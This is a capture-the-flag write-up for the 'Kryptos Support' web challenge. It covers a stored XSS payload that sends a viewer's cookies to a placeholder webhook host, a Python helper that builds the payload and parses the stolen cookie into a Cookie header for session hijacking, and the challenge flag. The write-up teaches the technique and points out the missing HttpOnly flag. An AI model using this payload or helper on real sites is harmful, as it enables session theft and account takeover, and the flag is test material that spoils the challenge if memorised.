Tags: xss idor 

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/kryptos_support/1.png)

The first page you are greeted with is a form for leaving feedback for the Kryptos Vault:

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/kryptos_support/2.png)

There is also a "backend" button that we can't click, but poking at it leads us to `/admin` and the following login page:

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/kryptos_support/3.png)

Throwing a simple stored XSS payload at the feedback page works right off the bat. Only `document.write(';)` of the original payload survived on this page (the injected `<img>` tag appears to have been swallowed by the markdown renderer), so the payload below is reconstructed around it; `https://<your-webhook>/` is a placeholder for your own listener, not the address used in the original:

```html
<script>
  // Ship the viewer's cookies to our webhook as the query string of an image request.
  // encodeURIComponent keeps the ';' and '=' inside document.cookie intact in the URL.
  document.write('<img src="https://<your-webhook>/?c=' + encodeURIComponent(document.cookie) + '">');
</script>
```

When the support staff open our feedback, the script fires and our webhook receives a request carrying their cookie. The admin cookie! That `document.cookie` could read it at all means the session cookie was not set with `HttpOnly`, which is the one check that would have stopped this. Setting the stolen cookie as our own in the browser gets us past the login and into the backend, where we retrieve our flag.

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/kryptos_support/4.png)
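The three mechanical steps of the cookie-theft chain above (build the payload, pull the cookie out of the hit the webhook logs, assemble the `Cookie` header for the replay against `/admin`) as a small Python helper. This is an added example, not code from the original writeup or the challenge; the webhook URL and the logged request line are constructed placeholders, and the cookie value is made up.

```python
"""Helpers for the cookie-theft step of the Kryptos Support XSS.

Added example, not part of the original writeup. Builds the exfiltration
payload, parses the hit that lands on the webhook, and assembles the
Cookie header used to replay the stolen session against /admin.
The webhook URL and every sample value below are constructed placeholders.
"""
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit


def build_payload(webhook_url: str) -> str:
    """Stored-XSS payload that ships document.cookie to webhook_url.

    encodeURIComponent matters: document.cookie looks like "a=1; b=2",
    and a raw ';' or '=' would otherwise be mangled in the query string.
    """
    return (
        "<script>document.write('<img src=\"" + webhook_url
        + "?c=' + encodeURIComponent(document.cookie) + '\">');</script>"
    )


def cookies_from_webhook_hit(request_target: str) -> dict[str, str]:
    """Recover the victim's cookies from the path+query the webhook logged."""
    query = parse_qs(urlsplit(request_target).query)
    raw = query.get("c", [""])[0]      # parse_qs already percent-decodes
    jar = SimpleCookie()
    jar.load(raw)                      # understands the "a=1; b=2" format
    return {name: morsel.value for name, morsel in jar.items()}


def cookie_header(cookies: dict[str, str]) -> str:
    """Value of the Cookie header to send with our own request to /admin."""
    return "; ".join(f"{k}={v}" for k, v in cookies.items())


if __name__ == "__main__":
    WEBHOOK = "https://webhook.example/abc123"   # placeholder, not a real listener
    print(build_payload(WEBHOOK))
    # Constructed example of the request line a webhook shows once the
    # support user renders our feedback (cookie value is invented):
    hit = "/abc123?c=session%3DeyJhZG1pbiI6dHJ1ZX0.sig%3B%20theme%3Ddark"
    stolen = cookies_from_webhook_hit(hit)
    print(stolen)
    print("Cookie:", cookie_header(stolen))
```

Paste the output of `cookie_header` into the browser's cookie for the site, or send it as a `Cookie:` header from `curl`, and `/admin` treats the request as the support user. If the webhook shows a hit with an empty `c=`, the cookie was `HttpOnly` and this route is closed.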

`Flag: HTB{x55_4nd_id0rs_ar3_fun!!}`

Original writeup (https://newyork167.github.io/infosec/cyber%20apocalypse%202022/web/2022/05/19/cyber-apocalypse-2022-writeups-web-kryptos-support.html).